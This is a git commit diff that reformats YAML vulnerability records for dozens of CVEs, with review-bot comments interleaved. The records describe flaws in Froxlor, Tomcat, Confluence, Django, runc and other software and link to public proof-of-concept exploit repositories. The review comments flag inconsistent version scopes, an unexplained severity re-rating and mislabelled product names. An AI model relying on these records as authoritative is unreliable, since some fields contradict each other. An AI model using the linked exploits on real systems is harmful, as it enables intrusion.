Pre Merge pull request !450 from Re3et/master
commit
93b9899123
|
@ -1,6 +1,5 @@
|
|||
id: CVE-2021-42325
|
||||
source:
|
||||
https://www.exploit-db.com/exploits/50502
|
||||
source: https://www.exploit-db.com/exploits/50502
|
||||
info:
|
||||
name: Froxlor是一款易于使用且功能强大的服务器管理面板,用于管理各种主机和域名服务。
|
||||
severity: high
|
||||
|
@ -8,7 +7,7 @@ info:
|
|||
Froxlor是Froxlor团队的一套轻量级服务器管理软件。
|
||||
Froxlor存在安全漏洞,该漏洞允许在数据库管理器DbManagerMySQL.php中通过自定义数据库名称注入SQL。
|
||||
scope-of-influence:
|
||||
Froxlor 0.9~0.10.30
|
||||
0.9 < Froxlor < 0.10.30
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-42325
|
||||
- https://avd.aliyun.com/detail?id=AVD-2021-42325
|
||||
|
|
|
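Review bot: the new scope line `0.9 < Froxlor < 0.10.30` uses strict bounds on both ends, while the `Froxlor 0.9~0.10.30` form it replaces reads as an inclusive range, so the rewrite drops 0.9 and 0.10.30 from the stated scope without saying so. Check the NVD entry in the reference list for which endpoints are affected and write `≤` where they are, as the `2.4.20 ≤ Apache HTTP ≤ 2.4.43` line elsewhere in this commit does.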
@ -1,13 +1,12 @@
|
|||
id: CVE-2023-0315
|
||||
source:
|
||||
https://github.com/mhaskar/CVE-2023-0315
|
||||
source: https://github.com/mhaskar/CVE-2023-0315
|
||||
info:
|
||||
name: Froxlor是一款易于使用且功能强大的服务器管理面板,用于管理各种主机和域名服务。
|
||||
severity: high
|
||||
description: |
|
||||
Froxlor 2.0.8 之前的版本存在远程代码执行漏洞。攻击者可以在未经身份验证的情况下利用这个漏洞在OS级别执行任意代码。
|
||||
scope-of-influence:
|
||||
Froxlor 2.0.8 之前的版本
|
||||
Froxlor < 2.0.8
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2023-0315
|
||||
- https://github.com/froxlor/froxlor/commit/090cfc26f2722ac3036cc7fd1861955bc36f065a
|
||||
|
|
|
@ -1,13 +1,12 @@
|
|||
id: CVE-2023-0877
|
||||
source:
|
||||
https://huntr.dev/bounties/b29cf038-06f1-4fb0-9437-08f2991f92a8/
|
||||
source: https://huntr.dev/bounties/b29cf038-06f1-4fb0-9437-08f2991f92a8/
|
||||
info:
|
||||
name: Froxlor是一款易于使用且功能强大的服务器管理面板,用于管理各种主机和域名服务。
|
||||
severity: high
|
||||
description: |
|
||||
Code Injection in GitHub repository froxlor/froxlor prior to 2.0.11.
|
||||
scope-of-influence:
|
||||
Froxlor before 2.0.8
|
||||
Froxlor < 2.0.8
|
||||
reference:
|
||||
- https://github.com/blakduk/Advisories
|
||||
- https://huntr.dev/bounties/b29cf038-06f1-4fb0-9437-08f2991f92a8/
|
||||
|
|
|
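Review bot: the rewritten scope line `Froxlor < 2.0.8` contradicts the unchanged description just above it, which says the issue affects froxlor/froxlor "prior to 2.0.11". The 2.0.8 bound matches the CVE-2023-0315 entry earlier in this commit and may have been copied from it. Since the line is being edited anyway, align it with the description or cite the source for 2.0.8.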
@ -10,7 +10,7 @@ info:
|
|||
reference:
|
||||
- https://grafana.com/blog/2021/12/08/an-update-on-0day-cve-2021-43798-grafana-directory-traversal/
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2021-43798
|
||||
cwe-id: CWE-22
|
||||
|
|
|
@ -4,9 +4,9 @@ info:
|
|||
name: InfluxDB 1.7.6之前版本中的services/httpd/handler.go中的authenticate函数存在认证绕过漏洞。该漏洞源于JWT令牌可能具有空SharedSecret。攻击者可利用该漏洞绕过认证。
|
||||
severity: critical
|
||||
description: |
|
||||
InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret).
|
||||
InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret).
|
||||
scope-of-influence:
|
||||
InfluxData InfluxDB <1.7.6
|
||||
InfluxData InfluxDB < 1.7.6
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-20933
|
||||
classification:
|
||||
|
|
|
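Review bot: the `name:` context line at the top of this hunk still carries the whole vulnerability description (the authenticate function, the empty SharedSecret) instead of a product name. The Tomcat CVE-2020-9484 and CVE-2022-29885 hunks in this same commit move that kind of text out of `name` and into `description`; this entry should get the same treatment so the field means the same thing across files.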
@ -4,7 +4,9 @@ info:
|
|||
name: Java SE(Java Standard Edition,Java 标准版)是Java技术的核心和基础,是Java ME和Java EE编程的基础。Java SE是Java程序设计语言和Java平台的总称。
|
||||
severity: high
|
||||
description: Oracle Java SE(组件:库)中存在漏洞。易被利用的漏洞允许未经身份验证的攻击者通过多种协议进行网络访问,从而危害Oracle Java SE、Oracle GraalVM Enterprise Edition。成功攻击此漏洞会导致对关键数据或所有Oracle Java SE、Oracle GraalVM Enterprise Edition可访问数据进行未经授权的创建、删除或修改访问。
|
||||
scope-of-influence: Oracle Java SE:17.0.2和18;Oracle GraalVM企业版:21.3.1和22.0.0.2
|
||||
scope-of-influence:
|
||||
Oracle Java SE:17.0.2和18
|
||||
Oracle GraalVM企业版:21.3.1和22.0.0.2
|
||||
reference:
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21449
|
||||
- https://security.netapp.com/advisory/ntap-20220429-0006/
|
||||
|
|
|
@ -1,6 +1,5 @@
|
|||
id: CVE-2019-8942
|
||||
source:
|
||||
https://github.com/synacktiv/CVE-2019-8942
|
||||
source: https://github.com/synacktiv/CVE-2019-8942
|
||||
info:
|
||||
name: WordPress是一款免费开源的内容管理系统(CMS),目前已经成为全球使用最多的CMS建站程序。
|
||||
severity: high
|
||||
|
|
|
@ -233,4 +233,4 @@ The available modes are:
|
|||
|
||||
args = p.parse_args()
|
||||
|
||||
main(args)
|
||||
main(args)
|
|
@ -11,7 +11,7 @@ info:
|
|||
- https://apisix.apache.org/zh/docs/apisix/plugins/batch-requests
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-24112
|
||||
cwe-id: CWE-290
|
||||
cnvd-id: None
|
||||
|
|
|
@ -8,8 +8,8 @@ info:
|
|||
scope-of-influence:
|
||||
apache-CouchDB < 3.2.2
|
||||
reference:
|
||||
- http://packetstormsecurity.com/files/167032/Apache-CouchDB-3.2.1-Remote-Code-...
|
||||
- http://packetstormsecurity.com/files/169702/Apache-CouchDB-Erlang-Remote-Code...
|
||||
- http://packetstormsecurity.com/files/167032/Apache-CouchDB-3.2.1-Remote-Code-Execution.html
|
||||
- http://packetstormsecurity.com/files/169702/Apache-CouchDB-Erlang-Remote-Code-Execution.html
|
||||
- http://www.openwall.com/lists/oss-security/2022/04/26/1
|
||||
- http://www.openwall.com/lists/oss-security/2022/05/09/1
|
||||
- http://www.openwall.com/lists/oss-security/2022/05/09/2
|
||||
|
@ -17,7 +17,7 @@ info:
|
|||
- http://www.openwall.com/lists/oss-security/2022/05/09/4
|
||||
- https://docs.couchdb.org/en/3.2.2/setup/cluster.html
|
||||
- https://lists.apache.org/thread/w24wo0h8nlctfps65txvk0oc5hdcnv00
|
||||
- https://medium.com/@_sadshade/couchdb-erlang-and-cookies-rce-on-default-setti...
|
||||
- https://medium.com/@_sadshade/couchdb-erlang-and-cookies-rce-on-default-settings-b1e9173a4bcd
|
||||
- https://www.openwall.com/lists/oss-security/2022/04/26/1
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
|
@ -26,7 +26,4 @@ info:
|
|||
cwe-id: CWE-1188
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags:
|
||||
- 不安全的默认资源初始化
|
||||
- 弱口令要求
|
||||
- 远程代码执行
|
||||
tags: 不安全的默认资源初始化, 弱口令要求, 远程代码执行
|
|
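Review bot: the new `tags:` line turns a three-item YAML sequence into one plain scalar, so a consumer that iterated the list now receives the single string `不安全的默认资源初始化, 弱口令要求, 远程代码执行`. If the schema really wants a string, state the separator (comma plus space) in the template documentation and confirm the loader splits on it; the same conversion is made in several other tags hunks of this commit.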
@ -12,7 +12,7 @@ info:
|
|||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-17564
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2019-17564
|
||||
cwe-id: CWE-502
|
||||
|
|
|
@ -11,7 +11,7 @@ info:
|
|||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-25641
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2021-25641
|
||||
cwe-id: CWE-502
|
||||
|
|
|
@ -11,7 +11,7 @@ info:
|
|||
- https://help.aliyun.com/document_detail/390193.html
|
||||
- https://lists.apache.org/thread/1mszxrvp90y01xob56yp002939c7hlww
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2021-43297
|
||||
cwe-id: CWE-502
|
||||
|
|
|
@ -8,11 +8,10 @@ info:
|
|||
description: |
|
||||
Apache HTTP Server 2.4.20版本至2.4.43版本中存在安全漏洞,攻击者可借助‘Cache-Digest’标头中带有特制值的HTTP/2请求利用该漏洞造成Push Diary崩溃。
|
||||
scope-of-influence:
|
||||
Apache HTTP = 2.4.20-2.4.43
|
||||
2.4.20 ≤ Apache HTTP ≤ 2.4.43
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-9490
|
||||
- https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2020-9490
|
||||
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
|
||||
cvss-score: 7.5
|
||||
|
|
|
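Review bot: the new range line uses the non-ASCII operator `≤`, while other files in this commit write the same relation as `<=` (for example `5.7.0 <= Spring Security <= 5.7.4`). Pick one spelling for the whole repository so `scope-of-influence` can be grepped or parsed consistently.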
@ -17,4 +17,4 @@ info:
|
|||
cwe-id: CWE-22
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: cve2021,Apache,目录遍历
|
||||
tags: cve2021, Apache, 目录遍历
|
|
@ -6,7 +6,7 @@ info:
|
|||
description: |
|
||||
Apache HTTP Server 2.4.50版本中对CVE-2021-41773修复不够完善,攻击者可利用该漏洞绕过修复补丁,并利用目录穿越攻击访问服务器中一些文件,进而造成敏感信息泄露。若httpd中开启CGI功能,攻击者可以构造恶意请求,造成远程代码执行。
|
||||
scope-of-influence:
|
||||
Apache HTTP = 2.4.49, Apache HTTP = 2.4.50
|
||||
2.4.49 ≤ Apache HTTP ≤ 2.4.50
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-42013
|
||||
- https://httpd.apache.org/security/vulnerabilities_24.html
|
||||
|
@ -17,4 +17,4 @@ info:
|
|||
cwe-id: CWE-22
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: cve2021,Apache,目录遍历,RCE
|
||||
tags: cve2021, Apache, 目录遍历, RCE
|
|
@ -5,7 +5,6 @@ info:
|
|||
severity: critical
|
||||
description:
|
||||
CVE-2021-26295漏洞由RMI反序列化造成的远程代码执行漏洞,攻击者可构造恶意请求,触发反序列化,从而造成任意代码执行,控制服务器。
|
||||
|
||||
scope-of-influence:
|
||||
Apache OFBiz < 17.12.06
|
||||
reference:
|
||||
|
|
|
@ -6,7 +6,7 @@ info:
|
|||
description: |
|
||||
在Apache Shiro中,RegexRequestMatcher可以被错误配置为在某些servlet容器上被绕过。应用程序使用RegExPatternMatcher和正则表达式中的'.'可能容易受到旁路授权的攻击。
|
||||
scope-of-influence:
|
||||
Apache Shiro 1.9.1之前
|
||||
Apache Shiro < 1.9.1
|
||||
reference:
|
||||
- https://lists.apache.org/thread/y8260dw8vbm99oq7zv6y3mzn5ovk90xh
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-32532
|
||||
|
@ -14,10 +14,10 @@ info:
|
|||
- https://cxsecurity.com/cveshow/CVE-2022-32532/
|
||||
- https://vigilance.fr/vulnerability/Oracle-Fusion-Middleware-vulnerabilities-of-October-2022-39612
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-32532
|
||||
cwe-id: CWE-863
|
||||
cnvd-id: CNNVD-202206-2750
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: 旁路授权
|
|
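Review bot: replacing `cnvd-id: CNNVD-202206-2750` with `cnvd-id: None` discards the CNNVD identifier altogether. CNNVD and CNVD are separate databases, so taking the value out of `cnvd-id` is correct, but keep it somewhere, for instance as a reference entry, rather than losing it. The Solr CVE-2021-27905 hunk drops `CNNVD-202104-914` the same way.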
@ -16,5 +16,4 @@ info:
|
|||
cwe-id: CWE-502
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags:
|
||||
- 远程命令执行
|
||||
tags: 远程命令执行
|
|
@ -16,5 +16,4 @@ info:
|
|||
cwe-id: CWE-20
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags:
|
||||
- 远程命令执行
|
||||
tags: 远程命令执行
|
|
@ -20,5 +20,4 @@ info:
|
|||
cwe-id: CWE-1321
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags:
|
||||
- 远程命令执行
|
||||
tags: 远程命令执行
|
||||
|
|
|
@ -2,7 +2,7 @@ id: CVE-2021-27905
|
|||
source: https://github.com/Henry4E36/Solr-SSRF
|
||||
info:
|
||||
name: Apache Solr是美国阿帕奇(Apache)基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。
|
||||
severity: high
|
||||
severity: Critical
|
||||
description:
|
||||
Apache Solr 8.8.2之前版本存在代码问题漏洞,攻击者可利用masterUrl参数将索引数据复制到本地内核中。
|
||||
scope-of-influence:
|
||||
|
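Review bot: `severity: Critical` is capitalised, whereas the other entries touched by this commit use lowercase values (`severity: critical`, `severity: high`). Use the lowercase form so filters on this field match. The change from high to critical is also a re-rating, not formatting, and should be mentioned in the commit message.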
@ -11,9 +11,10 @@ info:
|
|||
- https://nvd.nist.gov/vuln/detail/CVE-2021-27905
|
||||
- https://security.netapp.com/advisory/ntap-20210611-0009/
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 8.1
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2021-27905
|
||||
cnvd-id: CNNVD-202104-914
|
||||
cwe-id: CWE-918
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: cve2021,Apache,Solr,SSRF
|
||||
tags: cve2021, Apache, Solr, SSRF
|
||||
|
|
|
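Review bot: the classification block changes the vector from `AC:H` with score 8.1 to `AC:L` with score 9.8, a substantive re-rating inside what is otherwise a formatting cleanup. State in the commit message where the new vector comes from and check it against the NVD link in this entry's reference list.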
@ -15,7 +15,7 @@ info:
|
|||
- https://blog.redteam-pentesting.de/2020/websocket-vulnerability-tomcat/
|
||||
- https://lists.apache.org/thread.html/rd48c72bd3255bda87564d4da3791517c074d94f8a701f93b85752651%40%3Cannounce.tomcat.apache.org%3E
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2020-13935
|
||||
cwe-id: CWE-835
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2020-1938
|
||||
source: https://github.com/Hancheng-Lei/Hacking-Vulnerability-CVE-2020-1938-Ghostcat
|
||||
info:
|
||||
name: Java 是目前 Web 开发中主流的编程语言,而 Tomcat 是当前流行的 Java 中间件服务器之一,从初版发布到现在已经有二十多年历史,在世界范围内广泛使用。
|
||||
name: Apache Tomcat是美国阿帕奇(Apache)软件基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServer Page(JSP)的支持。
|
||||
severity: critical
|
||||
description:
|
||||
Ghostcat(幽灵猫) 是由长亭科技安全研究员发现的存在于 Tomcat 中的安全漏洞,由于 Tomcat AJP 协议设计上存在缺陷,攻击者通过 Tomcat AJP Connector 可以读取或包含 Tomcat 上所有 webapp 目录下的任意文件,例如可以读取 webapp 配置文件或源代码。此外在目标应用有文件上传功能的情况下,配合文件包含的利用还可以达到远程代码执行的危害。
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2020-9484
|
||||
source: https://github.com/RepublicR0K/CVE-2020-9484
|
||||
info:
|
||||
name: Apache Tomcat 是一个开放源代码、运行servlet和JSP Web应用软件的基于Java的Web应用软件容器。当Tomcat使用了自带session同步功能时,使用不安全的配置(没有使用EncryptInterceptor)会存在反序列化漏洞,攻击者通过精心构造的数据包, 可以对使用了自带session同步功能的Tomcat服务器进行攻击。
|
||||
name: Apache Tomcat 是一个开放源代码、运行servlet和JSP Web应用软件的基于Java的Web应用软件容器。
|
||||
severity: high
|
||||
description:
|
||||
当Tomcat使用了自带session同步功能时,使用不安全的配置(没有使用EncryptInterceptor)会存在反序列化漏洞,攻击者通过精心构造的数据包, 可以对使用了自带session同步功能的Tomcat服务器进行攻击。
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2022-29885
|
||||
source: https://github.com/quynhlab/CVE-2022-29885
|
||||
info:
|
||||
name: Apache Tomcat是美国阿帕奇(Apache)基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServer Page(JSP)的支持。Apache Tomcat存在资源管理错误漏洞。攻击者利用该漏洞通过 EncryptInterceptor 导致 Apache Tomcat 过载,从而触发拒绝服务。
|
||||
name: Apache Tomcat是美国阿帕奇(Apache)基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServer Page(JSP)的支持。
|
||||
severity: high
|
||||
description:
|
||||
当Tomcat开启集群配置,且通过NioReceiver通信时,无论服务端是否配置EncryptInterceptor,攻击者均可构造特制请求导致目标服务器拒绝服务。
|
||||
|
|
|
@ -1,6 +1,5 @@
|
|||
id: CVE-2020-13942
|
||||
source:
|
||||
None
|
||||
source: None
|
||||
info:
|
||||
name: Apache Unomi 是一个基于标准的客户数据平台(CDP,Customer Data Platform),用于管理在线客户和访客等信息,以提供符合访客隐私规则的个性化体验,比如 GDPR 和“不跟踪”偏好设置。其最初于 Jahia 开发,2015 年 10 月提交给了 Apache 孵化器。
|
||||
severity: critical
|
||||
|
|
|
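Review bot: `source: None` here and `source: none` in the CVE-2019-3394 file that follows are both loaded by YAML as ordinary strings, not as null, and they differ in case. Choose one placeholder and use it everywhere; if the intent is "no source", an empty value or `null` expresses that without a magic string.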
@ -1,6 +1,5 @@
|
|||
id: CVE-2019-3394
|
||||
source:
|
||||
none
|
||||
source: none
|
||||
info:
|
||||
name: Atlassian Confluence Server是澳大利亚Atlassian公司的一套专业的企业知识管理与协同软件,也可以用于构建企业WiKi。Confluence Data Center是Confluence Center的数据中心版本。
|
||||
severity: high
|
||||
|
|
|
@ -1,5 +1,5 @@
|
|||
id: CVE-2019-3396
|
||||
source:
|
||||
source: https://github.com/Yt1g3r/CVE-2019-3396_EXP
|
||||
info:
|
||||
name: Confluence是一个专业的企业知识管理与协同软件,可用于构建企业wiki。
|
||||
severity: critical
|
||||
|
@ -20,4 +20,4 @@ info:
|
|||
cwe-id: CWE-22
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: RCE,cve2019,任意文件读取
|
||||
tags: RCE, cve2019, 任意文件读取
|
|
@ -47,4 +47,4 @@ info:
|
|||
cwe-id: CWE-74
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: RCE,cve2021,OGNI注入
|
||||
tags: RCE, cve2021, OGNI注入
|
|
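Review bot: `OGNI注入` on the rewritten tags line looks like a typo for `OGNL注入` (Object-Graph Navigation Language). The line is being edited anyway, so fix the spelling now; otherwise a tag search for OGNL will miss this entry.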
@ -24,4 +24,4 @@ info:
|
|||
cwe-id: CWE-74
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: RCE,cve2022
|
||||
tags: RCE, cve2022
|
|
@ -1,6 +1,5 @@
|
|||
id: CVE-2022-26138
|
||||
source:
|
||||
https://github.com/shavchen/CVE-2022-26138
|
||||
source: https://github.com/shavchen/CVE-2022-26138
|
||||
info:
|
||||
name: Confluence是atlassian公司的产品,是一个专业的企业知识管理与协同软件,也可以用于构建企业wiki。
|
||||
severity: critical
|
||||
|
@ -20,4 +19,4 @@ info:
|
|||
cwe-id: CWE-798
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: RCE,cve2022
|
||||
tags: RCE, cve2022
|
|
@ -1,6 +1,5 @@
|
|||
id: CVE-2021-31542
|
||||
source:
|
||||
https://github.com/coffeehb/Some-PoC-oR-ExP/blob/master/Django/CVE-2021-31542.md
|
||||
source: https://github.com/coffeehb/Some-PoC-oR-ExP/blob/master/Django/CVE-2021-31542.md
|
||||
info:
|
||||
name: Django 是一个高级的 Python 网络框架,可以快速开发安全和可维护的网站。由经验丰富的开发者构建,Django 负责处理网站开发中麻烦的部分,因此你可以专注于编写应用程序,而无需重新开发。 它是免费和开源的,有活跃繁荣的社区,丰富的文档,以及很多免费和付费的解决方案。
|
||||
severity: high
|
||||
|
|
|
@ -1,6 +1,5 @@
|
|||
id: CVE-2022-28346
|
||||
source:
|
||||
https://github.com/DeEpinGh0st/CVE-2022-28346
|
||||
source: https://github.com/DeEpinGh0st/CVE-2022-28346
|
||||
info:
|
||||
name: Django 是一个高级的 Python 网络框架,可以快速开发安全和可维护的网站。由经验丰富的开发者构建,Django 负责处理网站开发中麻烦的部分,因此你可以专注于编写应用程序,而无需重新开发。 它是免费和开源的,有活跃繁荣的社区,丰富的文档,以及很多免费和付费的解决方案。
|
||||
severity: critical
|
||||
|
|
|
@ -1,6 +1,5 @@
|
|||
id: CVE-2022-34265
|
||||
source:
|
||||
https://github.com/aeyesec/CVE-2022-34265
|
||||
source: https://github.com/aeyesec/CVE-2022-34265
|
||||
info:
|
||||
name: Django 是一个高级的 Python 网络框架,可以快速开发安全和可维护的网站。由经验丰富的开发者构建,Django 负责处理网站开发中麻烦的部分,因此你可以专注于编写应用程序,而无需重新开发。 它是免费和开源的,有活跃繁荣的社区,丰富的文档,以及很多免费和付费的解决方案。
|
||||
severity: critical
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2019-16884
|
||||
source: https://github.com/teamssix/TWiki/blob/c0252efe2cca4b9f750b921ce390af0d9667aca8/docs/CloudNative/Docker/CVE-2019-16884.md
|
||||
info:
|
||||
name: Linux kernel is the kernel used by Linux Foundation's open source operating system Linux.
|
||||
name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
|
||||
severity: high
|
||||
description: |
|
||||
runc through 1.0.0-rc8, as used in Docker through 19.03.2-ce and other products, allows AppArmor restriction bypass because libcontainer/rootfs_linux.go incorrectly checks mount targets, and thus a malicious Docker image can mount over a /proc directory
|
||||
|
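Review bot: the replacement `name:` line describes the Linux kernel, but the description in this entry is about runc (`libcontainer/rootfs_linux.go`, AppArmor restriction bypass via a malicious Docker image). Translating the line keeps the mismatch; the name should describe runc instead.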
@ -12,11 +12,11 @@ info:
|
|||
Red Hat OpenShift Container Platform 4.2
|
||||
Red Hat OpenShift Container Platform 3.9
|
||||
reference:
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16884
|
||||
- https://usn.ubuntu.com/usn/usn-4297-1
|
||||
- https://security.netapp.com/advisory/ntap-20220221-0004/
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16884
|
||||
- https://usn.ubuntu.com/usn/usn-4297-1
|
||||
- https://security.netapp.com/advisory/ntap-20220221-0004/
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2019-16884
|
||||
cwe-id: CWE-863
|
|
@ -10,7 +10,7 @@ info:
|
|||
RunC version <=1.0-rc6
|
||||
reference:
|
||||
- https://www.4hou.com/vulnerable/16361.html
|
||||
- https://github.com/Frichetten/CVE-2019-5736-PoC\
|
||||
- https://github.com/Frichetten/CVE-2019-5736-PoC
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
|
||||
cvss-score: 8.6
|
||||
|
@ -18,4 +18,4 @@ info:
|
|||
cwe-id: CWE-78
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: cve2019,docker.runc
|
||||
tags: cve2019, docker.runc
|
|
@ -19,7 +19,7 @@ info:
|
|||
- https://www.fortiguard.com/psirt/FG-IR-22-300
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-39952
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-39952
|
||||
cwe-id: CWE-610
|
||||
|
|
|
@ -19,4 +19,4 @@ info:
|
|||
cwe-id: CWE-94
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: RCE,cve2021,gitlab
|
||||
tags: RCE, cve2021, gitlab
|
|
@ -14,7 +14,7 @@ info:
|
|||
- https://www.tenable.com/plugins/nessus/152483
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22214
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
||||
cvss-score: 8.6
|
||||
cve-id: CVE-2021-22214
|
||||
cwe-id: CWE-918
|
||||
|
|
|
@ -19,4 +19,4 @@ info:
|
|||
cwe-id: CWE-798
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: UseOfHardCodedPassword,cve2022,gitlab
|
||||
tags: UseOfHardCodedPassword, cve2022, gitlab
|
|
@ -1,6 +1,5 @@
|
|||
id: CVE-2022-22978
|
||||
source:
|
||||
https://github.com/DeEpinGh0st/CVE-2022-22978
|
||||
source: https://github.com/DeEpinGh0st/CVE-2022-22978
|
||||
info:
|
||||
name: Spring Security是一个能够为基于Spring的企业应用系统提供声明式的安全访问控制解决方案的安全框架。
|
||||
severity: critical
|
||||
|
@ -13,7 +12,7 @@ info:
|
|||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-22978
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-22978
|
||||
cwe-id: CWE-863, CWE-285
|
||||
|
|
|
@ -1,6 +1,5 @@
|
|||
id: CVE-2017-8046
|
||||
source:
|
||||
https://github.com/m3ssap0/spring-break_cve-2017-8046
|
||||
source: https://github.com/m3ssap0/spring-break_cve-2017-8046
|
||||
info:
|
||||
name: Spring框架是 Java 平台的一个开源的全栈(full-stack)应用程序框架和控制反转容器实现,一般被直接称为 Spring。
|
||||
severity: high
|
||||
|
@ -12,7 +11,7 @@ info:
|
|||
reference:
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8046
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2017-8046
|
||||
cwe-id: CWE-20
